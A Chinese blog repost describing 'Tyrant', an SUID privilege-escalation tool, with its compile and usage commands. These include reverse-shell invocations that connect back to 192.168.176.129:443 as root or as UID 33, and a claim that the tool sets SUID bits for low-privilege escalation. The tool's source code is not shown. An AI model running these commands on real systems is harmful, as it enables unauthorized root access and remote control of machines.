Tyrant(暴君) SUID二进制文件权限提升工具

2025-01-25 118 0

Tyrant

Tyrant 是一个 SUID 二进制特权升级工具,权限提升或进行横向移动。

用法

使用以下命令编译源代码:

$ gcc tyrant.c -o tyrant

要显示帮助信息,请使用:

$ ./tyrant -h

Tyrant(暴君) SUID二进制文件权限提升工具插图

获取 UID

只需在没有任何参数的情况下运行该工具,即可列出当前用户的 UID 及其他用户详细信息:

$ ./tyrant

Tyrant(暴君) SUID二进制文件权限提升工具插图1

指定 UID 进行反向 Shell:根权限

**注意:**如果你尝试以低权限用户身份启动反向 Shell,将会失败。你必须结合 Tyrant 利用其他漏洞。

要以根权限启动反向 Shell,请执行:

# ./tyrant -uid 0 -rhost 192.168.176.129 -rport 443

Tyrant(暴君) SUID二进制文件权限提升工具插图2

执行后,Tyrant 将自动设置 SUID 位,允许低权限用户执行根权限升级操作。例如:

$ ./tyrant -uid 0 -rhost 192.168.176.129 -rport 443

Tyrant(暴君) SUID二进制文件权限提升工具插图3

Tyrant(暴君) SUID二进制文件权限提升工具插图4

指定其他 UID

你还可以通过指定另一个 UID 切换到不同的用户:

# ./tyrant -uid 33 -rhost 192.168.176.129 -rport 443

Tyrant(暴君) SUID二进制文件权限提升工具插图5


4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。

本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!

程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)

相关文章

数据分类分级之后这么做,让皇帝新衣的故事不再上演
深剖 MacOS 高危TCC绕过漏洞,全面解析 AMFI
Sliver C2框架漏洞解析:攻击者可建立TCP连接窃取数据流量
2025年十大最佳勒索软件防护工具
一键日卫星 (fastjson、shiro、nacos、jboss、struts2、tp、若依、通达、用友、禅道等漏洞挖掘工具)
EDUSRC证书站–上海某985大学

发布评论